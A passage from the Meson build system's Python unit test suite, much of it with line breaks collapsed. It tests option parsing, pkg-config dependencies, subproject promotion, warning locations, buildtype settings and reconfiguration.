garbage MSVC writes in the # source tree. 
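                # (Typically the .exp and .lib import-library artifacts plus the
                # .pdb/.ilk debug files that link.exe drops next to foo.dll when
                # /DEBUG is used; only the .c/.h/.in sources are kept below.)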
for fname in glob(os.path.join(testdir, 'foo.*')): if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']: os.unlink(fname) @skipIfNoPkgconfig @mock.patch.dict(os.environ) def test_pkgconfig_gen_escaping(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') prefix = '/usr/with spaces' libdir = 'lib' self.init(testdir, extra_args=['--prefix=' + prefix, '--libdir=' + libdir]) # Find foo dependency os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('libfoo', env, kwargs) # Ensure link_args are properly quoted libdir = PurePath(prefix) / PurePath(libdir) link_args = ['-L' + libdir.as_posix(), '-lfoo'] self.assertEqual(foo_dep.get_link_args(), link_args) # Ensure include args are properly quoted incdir = PurePath(prefix) / PurePath('include') cargs = ['-I' + incdir.as_posix(), '-DLIBFOO'] # pkg-config and pkgconf does not respect the same order self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs)) def test_array_option_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) expected['value'] = ['oink', 'boink'] self.setconf('-Dlist=oink,boink') changed = get_opt() self.assertEqual(changed, expected) def test_array_option_bad_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) with self.assertRaises(subprocess.CalledProcessError): self.setconf('-Dlist=bad') changed = get_opt() self.assertDictEqual(changed, expected) def test_array_option_empty_equivalents(self): """Array options treat -Dopt=[] and -Dopt= as equivalent.""" def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': [], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir, extra_args='-Dlist=') original = get_opt() self.assertDictEqual(original, expected) def opt_has(self, name, value): res = self.introspect('--buildoptions') found = False for i in res: if i['name'] == name: self.assertEqual(i['value'], value) found = True break self.assertTrue(found, "Array option not found in introspect data.") def test_free_stringarray_setting(self): testdir = os.path.join(self.common_test_dir, '41 options') self.init(testdir) self.opt_has('free_array_opt', []) self.setconf('-Dfree_array_opt=foo,bar', will_build=False) self.opt_has('free_array_opt', ['foo', 'bar']) self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False) self.opt_has('free_array_opt', ['a,b', 'c,d']) # When running under Travis Mac CI, the file updates seem to happen # too fast so the timestamps do not get properly updated. 
# Call this method before file operations in appropriate places # to make things work. def mac_ci_delay(self): if is_osx() and is_ci(): import time time.sleep(1) def test_options_with_choices_changing(self) -> None: """Detect when options like arrays or combos have their choices change.""" testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices')) options1 = str(testdir / 'meson_options.1.txt') options2 = str(testdir / 'meson_options.2.txt') # Test that old options are changed to the new defaults if they are not valid real_options = str(testdir / 'meson_options.txt') self.addCleanup(os.unlink, real_options) shutil.copy(options1, real_options) self.init(str(testdir)) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'b') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b']) self.assertEqual(item['choices'], ['b', 'c', 'd']) self.wipe() self.mac_ci_delay() # When the old options are valid they should remain shutil.copy(options1, real_options) self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c']) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'c') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b', 'c']) self.assertEqual(item['choices'], ['b', 'c', 'd']) def test_subproject_promotion(self): testdir = os.path.join(self.unit_test_dir, '12 promote') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') s3dir = os.path.join(spdir, 's3') scommondir = os.path.join(spdir, 'scommon') self.assertFalse(os.path.isdir(s3dir)) subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir, stdout=subprocess.DEVNULL) self.assertTrue(os.path.isdir(s3dir)) self.assertFalse(os.path.isdir(scommondir)) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'], cwd=workdir, stderr=subprocess.DEVNULL), 0) self.assertFalse(os.path.isdir(scommondir)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir) self.assertTrue(os.path.isdir(scommondir)) promoted_wrap = os.path.join(spdir, 'athing.wrap') self.assertFalse(os.path.isfile(promoted_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir) self.assertTrue(os.path.isfile(promoted_wrap)) self.init(workdir) self.build() def test_subproject_promotion_wrap(self): testdir = os.path.join(self.unit_test_dir, '44 promote wrap') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap') self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertFalse(os.path.isfile(ambiguous_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir) self.assertTrue(os.path.isfile(ambiguous_wrap)) def test_warning_location(self): tdir = os.path.join(self.unit_test_dir, '22 warning location') 
out = self.init(tdir) for expected in [ r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.', r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.', r'meson.build:6: WARNING: a warning of some sort', r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning', r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.', r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.", r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".', ]: self.assertRegex(out, re.escape(expected)) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: self.new_builddir() out = self.init(tdir, workdir=wd) expected = os.path.join(relpath(tdir, self.src_root), 'meson.build') relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, out) def test_error_location_path(self): '''Test locations in meson errors contain correct paths''' # this list contains errors from all the different steps in the # lexer/parser/interpreter we have tests for. for (t, f) in [ ('10 out of bounds', 'meson.build'), ('18 wrong plusassign', 'meson.build'), ('61 bad option argument', 'meson_options.txt'), ('102 subdir parse error', os.path.join('subdir', 'meson.build')), ('103 invalid option file', 'meson_options.txt'), ]: tdir = os.path.join(self.src_root, 'test cases', 'failing', t) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: try: self.init(tdir, workdir=wd) except subprocess.CalledProcessError as e: expected = os.path.join('test cases', 'failing', t, f) relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, e.output) else: self.fail('configure unexpectedly succeeded') def test_permitted_method_kwargs(self): tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs') out = self.init(tdir) for expected in [ r'WARNING: Passed invalid keyword argument "prefixxx".', r'WARNING: Passed invalid keyword argument "argsxx".', r'WARNING: Passed invalid keyword argument "invalidxx".', ]: self.assertRegex(out, re.escape(expected)) def test_templates(self): ninja = detect_ninja() if ninja is None: raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.') langs = ['c'] env = get_fake_env() for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']: try: comp = getattr(env, f'detect_{l}_compiler')(MachineChoice.HOST) with tempfile.TemporaryDirectory() as d: comp.sanity_check(d, env) langs.append(l) except EnvironmentException: pass for lang in langs: for target_type in ('executable', 'library'): # test empty directory with tempfile.TemporaryDirectory() as tmpdir: self._run(self.meson_command + ['init', '--language', lang, '--type', target_type], workdir=tmpdir) self._run(self.setup_command + ['--backend=ninja', 'builddir'], workdir=tmpdir) self._run(ninja, workdir=os.path.join(tmpdir, 'builddir')) # test directory with existing code file if lang in {'c', 'cpp', 'd'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'foo.' 
+ lang), 'w') as f: f.write('int main(void) {}') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) elif lang in {'java'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f: f.write('public class Foo { public static void main() {} }') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) def test_compiler_run_command(self): ''' The test checks that the compiler object can be passed to run_command(). ''' testdir = os.path.join(self.unit_test_dir, '24 compiler run_command') self.init(testdir) def test_identical_target_name_in_subproject_flat_layout(self): ''' Test that identical targets in different subprojects do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_identical_target_name_in_subdir_flat_layout(self): ''' Test that identical targets in different subdirs do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '182 same target name flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_flock(self): exception_raised = False with tempfile.TemporaryDirectory() as tdir: os.mkdir(os.path.join(tdir, 'meson-private')) with BuildDirLock(tdir): try: with BuildDirLock(tdir): pass except MesonException: exception_raised = True self.assertTrue(exception_raised, 'Double locking did not raise exception.') @unittest.skipIf(is_osx(), 'Test not applicable to OSX') def test_check_module_linking(self): """ Test that link_with: a shared module issues a warning https://github.com/mesonbuild/meson/issues/2865 (That an error is raised on OSX is exercised by test failing/78) """ tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking') out = self.init(tdir) msg = ('WARNING: target links against shared modules. This is not ' 'recommended as it is not supported on some platforms') self.assertIn(msg, out) def test_ndebug_if_release_disabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip()) def test_ndebug_if_release_enabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip()) def test_guessed_linker_dependencies(self): ''' Test that meson adds dependencies for libraries based on the final linker command line. ''' testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies') testdirlib = os.path.join(testdirbase, 'lib') extra_args = None libdir_flags = ['-L'] env = get_fake_env(testdirlib, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}: # msvc-like compiler, also test it with msvc-specific flags libdir_flags += ['/LIBPATH:', '-LIBPATH:'] else: # static libraries are not linkable with -l with msvc because meson installs them # as .a files which unix_args_to_native will not know as it expects libraries to use # .lib as extension. For a DLL the import library is installed as .lib. 
            # Thus for msvc this test needs to use shared libraries to test the
            # path resolving logic in the dependency generation code path.
            extra_args = ['--default-library', 'static']

        initial_builddir = self.builddir
        initial_installdir = self.installdir

        for libdir_flag in libdir_flags:
            # build library
            self.new_builddir()
            self.init(testdirlib, extra_args=extra_args)
            self.build()
            self.install()
            libbuilddir = self.builddir
            installdir = self.installdir
            libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')

            # build user of library
            self.new_builddir()
            # replace is needed because meson mangles platform paths passed via LDFLAGS
            self.init(os.path.join(testdirbase, 'exe'),
                      override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
            self.build()
            self.assertBuildIsNoop()

            # rebuild library
            exebuilddir = self.builddir
            self.installdir = installdir
            self.builddir = libbuilddir
            # Microsoft's compiler is quite smart about touching import libs on changes,
            # so ensure that there is actually a change in symbols.
            self.setconf('-Dmore_exports=true')
            self.build()
            self.install()
            # no ensure_backend_detects_changes needed because self.setconf did that already

            # assert that the user of the library will be rebuilt
            self.builddir = exebuilddir
            self.assertRebuiltTarget('app')

            # restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir

    def test_conflicting_d_dash_option(self):
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        with self.assertRaises(subprocess.CalledProcessError) as e:
            self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
            # Just to ensure that we caught the correct error
            self.assertIn('passed as both', e.stderr)

    def _test_same_option_twice(self, arg, args):
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        self.init(testdir, extra_args=args)
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == arg:
                self.assertEqual(item['value'], 'bar')
                return
        raise Exception('Missing {} value?'.format(arg))

    def test_same_dash_option_twice(self):
        self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])

    def test_same_d_option_twice(self):
        self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])

    def test_same_project_d_option_twice(self):
        self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])

    def _test_same_option_twice_configure(self, arg, args):
        testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
        self.init(testdir)
        self.setconf(args)
        opts = self.introspect('--buildoptions')
        for item in opts:
            if item['name'] == arg:
                self.assertEqual(item['value'], 'bar')
                return
        raise Exception('Missing {} value?'.format(arg))

    def test_same_dash_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'bindir', ['--bindir=foo', '--bindir=bar'])

    def test_same_d_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'bindir', ['-Dbindir=foo', '-Dbindir=bar'])

    def test_same_project_d_option_twice_configure(self):
        self._test_same_option_twice_configure(
            'one', ['-Done=foo', '-Done=bar'])

    def test_command_line(self):
        testdir = os.path.join(self.unit_test_dir, '34 command line')
        # Verify default values when passing no args that affect the
        # configuration, and as a bonus, test that --profile-self works.
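        # (--profile-self makes Meson profile its own run; this test only checks that
        # configuring with the flag does not break anything.)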
self.init(testdir, extra_args=['--profile-self']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'static') self.assertEqual(obj.builtins['warning_level'].value, '1') self.assertEqual(obj.user_options['set_sub_opt'].value, True) self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3') self.wipe() # warning_level is special, it's --warnlevel instead of --warning-level # for historical reasons self.init(testdir, extra_args=['--warnlevel=2']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '2') self.setconf('--warnlevel=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '3') self.wipe() # But when using -D syntax, it should be 'warning_level' self.init(testdir, extra_args=['-Dwarning_level=2']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '2') self.setconf('-Dwarning_level=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '3') self.wipe() # Mixing --option and -Doption is forbidden with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) self.init(testdir) with self.assertRaises(subprocess.CalledProcessError) as cm: self.setconf(['--warnlevel=1', '-Dwarning_level=3']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) self.wipe() # --default-library should override default value from project() self.init(testdir, extra_args=['--default-library=both']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'both') self.setconf('--default-library=shared') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'shared') if self.backend is Backend.ninja: # reconfigure target works only with ninja backend self.build('reconfigure') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['default_library'].value, 'shared') self.wipe() # Should warn on unknown options out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo']) self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out) self.wipe() # Should fail on malformed option with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testdir, extra_args=['-Dfoo']) self.assertNotEqual(0, cm.exception.returncode) self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output) self.init(testdir) with self.assertRaises(subprocess.CalledProcessError) as cm: self.setconf('-Dfoo') self.assertNotEqual(0, cm.exception.returncode) self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output) self.wipe() # It is not an error to set wrong option for unknown subprojects or # language because we don't have control on which one will be selected. 
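        # e.g. '-Dwrong:bad=1' names a subproject that may never be configured at all,
        # so Meson cannot reject the option as unknown here.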
        self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
        self.wipe()

        # Test we can set subproject option
        self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
        self.wipe()

        # c_args value should be parsed with split_args
        self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])

        self.setconf('-Dc_args="foo bar" one two')
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
        self.wipe()

        self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
        obj = mesonbuild.coredata.load(self.builddir)
        self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
        self.wipe()

        # Setting the same option a 2nd time should override the first value
        try:
            self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
                                           '-Dbuildtype=plain', '-Dbuildtype=release',
                                           '-Db_sanitize=address', '-Db_sanitize=thread',
                                           '-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.builtins['bindir'].value, 'bar')
            self.assertEqual(obj.builtins['buildtype'].value, 'release')
            self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
            self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
            self.setconf(['--bindir=bar', '--bindir=foo',
                          '-Dbuildtype=release', '-Dbuildtype=plain',
                          '-Db_sanitize=thread', '-Db_sanitize=address',
                          '-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
            obj = mesonbuild.coredata.load(self.builddir)
            self.assertEqual(obj.builtins['bindir'].value, 'foo')
            self.assertEqual(obj.builtins['buildtype'].value, 'plain')
            self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
            self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
            self.wipe()
        except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass def test_warning_level_0(self): testdir = os.path.join(self.common_test_dir, '208 warning level 0') # Verify default values when passing no args self.init(testdir) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() # verify we can override w/ --warnlevel self.init(testdir, extra_args=['--warnlevel=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '1') self.setconf('--warnlevel=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() # verify we can override w/ -Dwarning_level self.init(testdir, extra_args=['-Dwarning_level=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '1') self.setconf('-Dwarning_level=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.builtins['warning_level'].value, '0') self.wipe() def test_feature_check_usage_subprojects(self): testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects') out = self.init(testdir) # Parent project warns correctly self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict") # Subprojects warn correctly self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler") self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler") # Subproject has a new-enough meson_version, no warning self.assertNotRegex(out, "WARNING: Project targeting.*Python") # Ensure a summary is printed in the subproject and the outer project self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'") self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}") self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'") self.assertRegex(out, " * 0.47.0: {'dict'}") def test_configure_file_warnings(self): testdir = os.path.join(self.common_test_dir, "14 configure file") out = self.init(testdir) self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*") self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in") # Warnings for configuration files that are overwritten. 
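        # Two configure_file() outputs with the same path should warn about the
        # overwrite; distinct outputs and @BASENAME@-derived names should not.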
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites") self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites") self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites") self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites") self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites") # No warnings about empty configuration data objects passed to files with substitutions self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in") self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in") with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */') with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'') self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict") def test_dirs(self): with tempfile.TemporaryDirectory() as containing: with tempfile.TemporaryDirectory(dir=containing) as srcdir: mfile = os.path.join(srcdir, 'meson.build') of = open(mfile, 'w') of.write("project('foobar', 'c')\n") of.close() pc = subprocess.run(self.setup_command, cwd=srcdir, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) self.assertIn(b'Must specify at least one directory name', pc.stdout) with tempfile.TemporaryDirectory(dir=srcdir) as builddir: subprocess.run(self.setup_command, check=True, cwd=builddir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def get_opts_as_dict(self): result = {} for i in self.introspect('--buildoptions'): result[i['name']] = i['value'] return result def test_buildtype_setting(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') self.assertEqual(opts['debug'], True) self.setconf('-Ddebug=false') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], False) self.assertEqual(opts['buildtype'], 'plain') self.assertEqual(opts['optimization'], '0') # Setting optimizations to 3 should cause buildtype # to go to release mode. self.setconf('-Doptimization=3') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'release') self.assertEqual(opts['debug'], False) self.assertEqual(opts['optimization'], '3') # Going to debug build type should reset debugging # and optimization self.setconf('-Dbuildtype=debug') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '0') # Command-line parsing of buildtype settings should be the same as # setting with `meson configure`. # # Setting buildtype should set optimization/debug self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=debugoptimized']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting optimization/debug should set buildtype self.new_builddir() self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting both buildtype and debug on the command-line should work, and # should warn not to do that. 
Also test that --debug is parsed as -Ddebug=true self.new_builddir() out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug']) self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_native_dep_pkgconfig(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = '{0}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig.py')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_pkg_config_libdir(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = 'pkg-config' [properties] pkg_config_libdir = ['{0}'] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) def __reconfigure(self, change_minor=False): # Set an older version to force a reconfigure from scratch filename = os.path.join(self.privatedir, 'coredata.dat') with open(filename, 'rb') as f: obj = pickle.load(f) if change_minor: v = mesonbuild.coredata.version.split('.') obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)]) else: obj.version = '0.47.0' with open(filename, 'wb') as f: pickle.dump(obj, f) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure() out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() # Create a file in builddir and verify wipe command removes it filename = os.path.join(self.builddir, 'something') open(filename, 'w').close() self.assertTrue(os.path.exists(filename)) out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4']) self.assertFalse(os.path.exists(filename)) self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 val4') self.build() self.run_tests() def test_wipe_from_builddir(self): testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files') self.init(testdir) self.__reconfigure() with 
